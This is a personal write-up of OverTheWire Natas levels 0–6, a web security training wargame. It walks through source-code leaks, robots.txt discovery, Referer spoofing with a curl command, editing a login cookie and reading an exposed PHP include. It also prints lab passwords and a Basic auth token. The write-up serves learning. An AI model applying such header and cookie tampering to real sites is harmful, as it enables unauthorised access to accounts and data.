Natas0-6
nurfitri •
Natas Online Web security training.
- my write-up for Natas
NATAS0
- Vulnerabilities here is sensitive information leak
- the answer is in the source code.
- pass: gtVrDuiDfck831PqWsLEZy5gyDz1clto
NATAS1
- same as before, but disabled right click.
- we can view source using CTRL+U
- or CTRL+SHIFT+C to open dev console.
- pass: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
NATAS2
- still sensitive information leak, but instead of on current source,
- it's is on other directory path called files
- we found users.txt
# username:password alice:BYNdCesZqW bob:jw2ueICLvT charlie:G5vCxkVV3m natas3:XXXXXXXXXXXXXXXXXXXXXXXXXX eve:zo4mJWyNj2 mallory:9urtcpzBmH
NATAS3
- here, there is nothing on the webpage itself.
- but there is a clue saying even google cant find it
- things that prevent google for indexing our website path is called robots.txt.
- this simple text file prevent google search engine to index any path mentions in this text file
- by navigating to the file, we see it is disallowing indexer bot from finding folder named /s3cr3t.
- there we found users.txt and
natas4:XXXXXXXXXXXXXXXXXXXXXXXXXX
- read more on robots.txt here
NATAS4
- from here on things get more interesting,
- the webpage say something like this
- let open up developer console, and take a look at our request under Network Tab.
- what we are focusing is here at our request to view the webpage.
-
seems like the webpage is checking the origin of where we come from.
-
from quick google, we found out that if we change the referer header we might be able to tell the website, we are comming from which page.
-
so now we need to find a way to change our request header.
-
there are few ways we can do this such as:
- using BurpSuite
- using postman
- using CURL.
-
I prefer to use curl, but you can try other methods.
- to use curl, we first need to copy the Authorization token in our request header.
- alternatively we can use the -u tag with the username:password of natas4
Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va- then, we can start constructing our request.
- we use -H to set our authorization header to the token we coppied earlier.
- then we use -e to change the referer to http://natas5.natas.labs.overthewire.org/
- alternatively we can also use -H to set our Referer header.
- the -H simply means to set Headers
- -b to set cookie.
- -A to set User-Agent.
- our curl request end up looking like this.
curl -H "Authorization: Basic bmF0YXM0Olo5dGtSa1dtcHQ5UXI3WHJSNWpXUmtnT1U5MDFzd0Va" -e "http://natas5.natas.labs.overthewire.org/" http://natas4.natas.labs.overthewire.org/index.php | grep natas5- we can also pipe it in grep to highlight the password
- after run it, we got the webpage
Access granted. The password for natas5 is XXXXXXXXXXXXXXXXXXXXXXXXXX
NATAS5
- here we got Access disallowed, We are not logged in.
- there are few possibilities here, login usually associated with session.
- let's take a look at the request and cookies via our Developer console.
- here we can see, there is a cookie called loggedin, and are set to 0.
- let us try change it to 1.
- on dev console, go to application tab > Storage > Cookies > click on natas5.
- here we can see the cookies used for this website.
- simply double click the value 0 of loggedin to edit it.
- after edit, simply refresh the page.
- we got
Access granted. The password for natas6 is XXXXXXXXXXXXXXXXXXXXXXXXXX
NATAS6
- here we got an input box asking for secret.
- inspecting the source code, we noticed, that the php code includes a file called secret.inc
<? include "includes/secret.inc"; if(array_key_exists("submit", $_POST)) { if($secret == $_POST['secret']) { print "Access granted. The password for natas7 is <censored>"; } else { print "Wrong secret"; } } ?>
- the files is used to check the secret.
- we try to see if we have access to the inclues/secret.inc by navigating to it on our browser.
- and indeed we can, and the file contains secret that we can use for the input.
<? $secret = "FOEIUWGHFEEUHOFUOIU"; ?>
- and we got this
Access granted. The password for natas7 is XXXXXXXXXXXXXXXXXXXXXXXXXX